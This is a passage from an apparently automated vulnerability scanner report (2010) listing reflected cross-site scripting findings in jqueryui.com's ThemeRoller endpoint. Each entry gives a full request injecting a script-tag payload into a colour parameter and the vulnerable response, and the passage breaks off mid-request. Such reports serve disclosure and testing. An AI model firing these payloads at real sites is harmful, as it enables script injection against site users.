Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:38 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="fcActive" id="fcActive" class="hex" value="0074c7549cc\\\"><script>alert(1)</script>a2548245a2c" size="6" />
...[SNIP]...

1.158. http://jqueryui.com/themeroller/_rollyourown.php [fcContent parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/_rollyourown.php

Issue detail

The value of the fcContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39623"><script>alert(1)</script>19a538c79bc was submitted in the fcContent parameter. This input was echoed as 39623\\\"><script>alert(1)</script>19a538c79bc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=38383839623"><script>alert(1)</script>19a538c79bc&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:28 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="fcContent" id="fcContent" class="hex" value="38383839623\\\"><script>alert(1)</script>19a538c79bc" size="6" />
...[SNIP]...

1.159. http://jqueryui.com/themeroller/_rollyourown.php [fcDefault parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/_rollyourown.php

Issue detail

The value of the fcDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3438"><script>alert(1)</script>5d8c48f277d was submitted in the fcDefault parameter. This input was echoed as e3438\\\"><script>alert(1)</script>5d8c48f277d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000e3438"><script>alert(1)</script>5d8c48f277d&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:31 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="fcDefault" id="fcDefault" class="hex" value="4c3000e3438\\\"><script>alert(1)</script>5d8c48f277d" size="6" />
...[SNIP]...

1.160. http://jqueryui.com/themeroller/_rollyourown.php [fcError parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/_rollyourown.php

Issue detail

The value of the fcError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4eb9"><script>alert(1)</script>c5c296af40f was submitted in the fcError parameter. This input was echoed as f4eb9\\\"><script>alert(1)</script>c5c296af40f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=fffffff4eb9"><script>alert(1)</script>c5c296af40f&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:47 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="fcError" id="fcError" class="hex" value="fffffff4eb9\\\"><script>alert(1)</script>c5c296af40f" size="6" />
...[SNIP]...

1.161. http://jqueryui.com/themeroller/_rollyourown.php [fcHeader parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/_rollyourown.php

Issue detail

The value of the fcHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 930d9"><script>alert(1)</script>3137f1e3c01 was submitted in the fcHeader parameter. This input was echoed as 930d9\\\"><script>alert(1)</script>3137f1e3c01 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff930d9"><script>alert(1)</script>3137f1e3c01&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:25 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="fcHeader" id="fcHeader" class="hex" value="ffffff930d9\\\"><script>alert(1)</script>3137f1e3c01" size="6" />
...[SNIP]...

1.162. http://jqueryui.com/themeroller/_rollyourown.php [fcHighlight parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/_rollyourown.php

Issue detail

The value of the fcHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7f7f"><script>alert(1)</script>9fa6ce8b5b8 was submitted in the fcHighlight parameter. This input was echoed as d7f7f\\\"><script>alert(1)</script>9fa6ce8b5b8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1fd7f7f"><script>alert(1)</script>9fa6ce8b5b8&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:44 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="fcHighlight" id="fcHighlight" class="hex" value="1f1f1fd7f7f\\\"><script>alert(1)</script>9fa6ce8b5b8" size="6" />
...[SNIP]...

1.163. http://jqueryui.com/themeroller/_rollyourown.php [fcHover parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/_rollyourown.php

Issue detail

The value of the fcHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0ba1"><script>alert(1)</script>88118119e1e was submitted in the fcHover parameter. This input was echoed as c0ba1\\\"><script>alert(1)</script>88118119e1e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00c0ba1"><script>alert(1)</script>88118119e1e&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverl